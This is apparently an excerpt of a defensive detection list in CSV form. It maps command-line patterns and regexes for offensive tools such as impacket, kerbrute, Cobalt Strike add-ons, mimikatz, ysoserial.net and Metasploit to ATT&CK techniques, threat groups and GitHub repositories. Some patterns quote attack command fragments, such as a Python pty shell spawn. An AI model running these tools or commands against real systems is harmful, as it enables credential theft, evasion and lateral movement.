"* -brute-opnums *",".{0,1000}\s\-brute\-opnums\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","469"
"* --brute-ratel*",".{0,1000}\s\-\-brute\-ratel.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","470"
"* Brutesploit*",".{0,1000}\sBrutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","471"
"* bruteuser *",".{0,1000}\sbruteuser\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","472"
"* bruteuser -d *",".{0,1000}\sbruteuser\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","473"
"* -brute-uuids *",".{0,1000}\s\-brute\-uuids\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","474"
"* build Dent.go*",".{0,1000}\sbuild\sDent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","475"
"* -Build -NoAttackPaths*",".{0,1000}\s\-Build\s\-NoAttackPaths.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","476"
"* build_arsenal_kit.sh*",".{0,1000}\sbuild_arsenal_kit\.sh.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","477"
"* build_letmeout*",".{0,1000}\sbuild_letmeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","478"
"* by @citronneur (v*",".{0,1000}\sby\s\@citronneur\s\(v.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","479"
"* by @JoelGMSec *",".{0,1000}\sby\s\@JoelGMSec\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","480"
"* By Alcatraz3222.exe*",".{0,1000}\sBy\sAlcatraz3222\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","481"
"* by erwan2212@gmail.com*",".{0,1000}\sby\serwan2212\@gmail\.com.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","482"
"* by Flangvik & Jean_Maes_1994*",".{0,1000}\sby\sFlangvik\s\&\sJean_Maes_1994.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","483"
"* --bypass --stealth --antisandox*",".{0,1000}\s\-\-bypass\s\-\-stealth\s\-\-antisandox.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","484"
"* BypassCredGuard.exe*",".{0,1000}\sBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","485"
"* BypassFramework.py*",".{0,1000}\sBypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","486"
"* BypassUac*.bat*",".{0,1000}\sBypassUac.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","487"
"* BypassUac*.dll*",".{0,1000}\sBypassUac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","488"
"* BypassUac*.exe*",".{0,1000}\sBypassUac.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","489"
"* -c ""!mimikatz"" *",".{0,1000}\s\-c\s\""!mimikatz\""\s.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","490"
"* -c * --choose-mutators * -s 1*",".{0,1000}\s\-c\s.{0,1000}\s\-\-choose\-mutators\s.{0,1000}\s\-s\s1.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","491"
"* -c * -o payload.ser*",".{0,1000}\s\-c\s.{0,1000}\s\-o\spayload\.ser.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","492"
"* -c * -s * -o share_listing -m 150*",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-o\sshare_listing\s\-m\s150.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","493"
"* -c * -s * --proxy * --proxyu * --proxyp * --reconnect *",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-\-proxy\s.{0,1000}\s\-\-proxyu\s.{0,1000}\s\-\-proxyp\s.{0,1000}\s\-\-reconnect\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","494"
"* -c *ExploitClass.cs*System.dll*",".{0,1000}\s\-c\s.{0,1000}ExploitClass\.cs.{0,1000}System\.dll.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","495"
"* -c *OBFUSCATION=*.ps1*",".{0,1000}\s\-c\s.{0,1000}OBFUSCATION\=.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","496"
"* -c '/accepteula /s calc.exe' -e PsExec64.exe*",".{0,1000}\s\-c\s\'\/accepteula\s\/s\scalc\.exe\'\s\-e\sPsExec64\.exe.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","0","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","497"
"* -c active_users -u *",".{0,1000}\s\-c\sactive_users\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","498"
"* -c all -d * --domaincontroller *",".{0,1000}\s\-c\sall\s\-d\s.{0,1000}\s\-\-domaincontroller\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","499"
"* -c command_exec --execute tasklist*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\stasklist.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","500"
"* -c command_exec --execute whoami*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\swhoami.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","501"
"* -c CredEnum.c*",".{0,1000}\s\-c\sCredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","502"
"* -c DCOnly -d * -u * -p * -o /tmp*",".{0,1000}\s\-c\sDCOnly\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-o\s\/tmp.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","503"
"* -c edr_query *",".{0,1000}\s\-c\sedr_query\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","504"
"* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","risk of False positive","4","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","506"
"* -c logon_events * -u *",".{0,1000}\s\-c\slogon_events\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","509"
"* -c ls --directory * -u * -p *",".{0,1000}\s\-c\sls\s\-\-directory\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","510"
